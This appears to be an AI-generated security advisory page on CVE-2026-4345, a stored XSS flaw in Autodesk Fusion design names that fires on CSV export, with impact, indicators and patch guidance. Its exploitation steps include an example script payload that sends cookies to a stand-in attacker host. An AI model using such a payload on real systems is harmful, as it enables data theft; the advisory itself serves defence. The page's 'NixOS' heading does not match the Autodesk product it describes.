CVE-2026-4345
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-4345 is a Stored Cross-Site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application (CWE-79). A maliciously crafted HTML payload embedded in a design name can be triggered when the design is exported to CSV, potentially allowing an attacker to read local files or execute arbitrary code within the application process. The vulnerability affects Autodesk Fusion versions 2606.0 through 2702.1.46, with the fix introduced in version 2702.1.47. It was published on April 14, 2026, and carries a CVSS v3.1 base score of 7.1 (High) (GitHub Advisory, Autodesk Advisory).

Technical details

The root cause is improper neutralization of user-controlled input (CWE-79) stored in design names within Autodesk Fusion. When a user exports a design to CSV, the application renders the design name in a context that interprets embedded HTML/JavaScript, triggering the stored XSS payload. The attack vector is local (AV:L), requires no privileges (PR:N), but does require user interaction — specifically, a victim must open or export the maliciously named design to CSV. No public proof-of-concept exploit code has been identified at this time (GitHub Advisory, Autodesk Advisory).

Impact

Successful exploitation allows a malicious actor to read local files from the victim's machine or execute arbitrary code in the context of the Autodesk Fusion process, resulting in high confidentiality and integrity impact with no availability impact. An attacker could exfiltrate sensitive design files, credentials, or other local data accessible to the Fusion process. The attack scenario requires a victim to open or export a design with a maliciously crafted name, making it a social-engineering-dependent but realistic threat in collaborative design environments (GitHub Advisory, Autodesk Advisory).

Exploitability

There is no evidence of active in-the-wild exploitation or a publicly available proof-of-concept at this time. The EPSS score is approximately 0.022–0.024%, placing it in the 7th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an attacker to share a maliciously named design with a target user who then exports it to CSV, limiting opportunistic exploitation (GitHub Advisory).

Exploitation steps

  1. Craft malicious design: An attacker creates or modifies an Autodesk Fusion design and sets the design name to a malicious HTML/JavaScript payload (e.g., <script>fetch('http://attacker.com/?data='+document.cookie)</script> or a payload that reads local files via the application's file access APIs).
  2. Share the design: The attacker shares the maliciously named design file with a target user through legitimate Fusion collaboration channels, email, or file sharing platforms.
  3. Trigger the payload: The victim opens the design in Autodesk Fusion and exports it to CSV format. During the CSV export process, the application renders the design name in an HTML context without proper sanitization, executing the embedded JavaScript payload.
  4. Achieve objective: The executed payload reads local files accessible to the Fusion process or executes arbitrary code in the context of the current user session, potentially exfiltrating data to an attacker-controlled server or establishing persistence (GitHub Advisory, Autodesk Advisory).

Indicators of compromise

  • File System: Unexpected files created in directories accessible to the Autodesk Fusion process; design files with names containing HTML tags or JavaScript syntax (e.g., <script>, onerror=, javascript:).
  • Network: Unusual outbound HTTP/HTTPS connections originating from the Autodesk Fusion process to unknown external IP addresses or domains, particularly shortly after a CSV export operation.
  • Logs: Application or system logs showing Autodesk Fusion initiating unexpected network connections or file read operations outside of normal design directories following a CSV export event.
  • Process: Unexpected child processes spawned by the Autodesk Fusion application process; unusual file access patterns to sensitive directories (e.g., user home directory, credential stores) by the Fusion process.

Mitigation and workarounds

Autodesk has released a patch in Fusion version 2702.1.47, which resolves this vulnerability. Users should update Autodesk Fusion to version 2702.1.47 or later immediately using the official Autodesk Fusion Client Downloader. As a temporary workaround prior to patching, users should avoid exporting designs to CSV if the design name contains suspicious HTML-like characters, and exercise caution when opening designs received from untrusted or unknown sources. Organizations should also implement access controls to restrict who can create and share designs internally (Autodesk Advisory, GitHub Advisory).

Community reactions

Coverage of CVE-2026-4345 has been limited to automated vulnerability tracking platforms and security alert aggregators such as RedPacket Security, VulDB, and CVE feed services. No notable independent researcher commentary or significant community discussion has been identified beyond standard CVE publication notices. The vulnerability was noted on Bluesky via automated CVE notification accounts shortly after disclosure.

Additional resources


SourceThis report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-75874CRITICAL10
  • NixOS logoNixOS
  • cpe:2.3:a:mozilla:firefox
NoYesAug 18, 2026
CVE-2026-74990CRITICAL9.8
  • NixOS logoNixOS
  • firefox-esr
NoYesAug 18, 2026
CVE-2026-74989CRITICAL9.8
  • NixOS logoNixOS
  • MozillaFirefox-translations-common
NoYesAug 18, 2026
CVE-2026-74988CRITICAL9.8
  • NixOS logoNixOS
  • cpe:2.3:a:mozilla:firefox
NoYesAug 18, 2026
CVE-2026-74987CRITICAL9.8
  • NixOS logoNixOS
  • firefox-esr
NoYesAug 18, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management